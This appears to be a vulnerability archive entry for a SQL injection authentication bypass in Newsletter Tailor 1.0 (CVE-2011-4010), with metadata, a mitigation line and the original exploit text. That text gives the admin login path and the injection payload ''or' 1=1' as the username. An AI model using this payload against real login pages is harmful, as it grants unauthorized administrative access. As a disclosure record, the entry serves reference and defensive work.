Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability

vendor:

Newsletter Tailor

by:

ViRuSMaN

CVSS

HIGH

Auth Bypass SQL Injection

CWE

Product Name: Newsletter Tailor

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: CVE-2011-4010

CPE: a:virusman:newsletter_tailor

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2011

Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability

Newsletter Tailor is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. A remote attacker can exploit this vulnerability to bypass authentication and gain access to the application.

Mitigation:

Upgrade to the latest version of Newsletter Tailor

Source

Exploit-DB raw data:

==============================================================================
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[»] Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability
==============================================================================

[»] Script: [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Site page: [ A powerful Newsletter/ Mass Mailer script with built-in ftp client and wysiwyg editor ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

[»] http://[target].com/[path]/admin/
[~] Username:'or' 1=1
[~] Password:ViRuSMaN


Author: ViRuSMaN <-

###########################################################################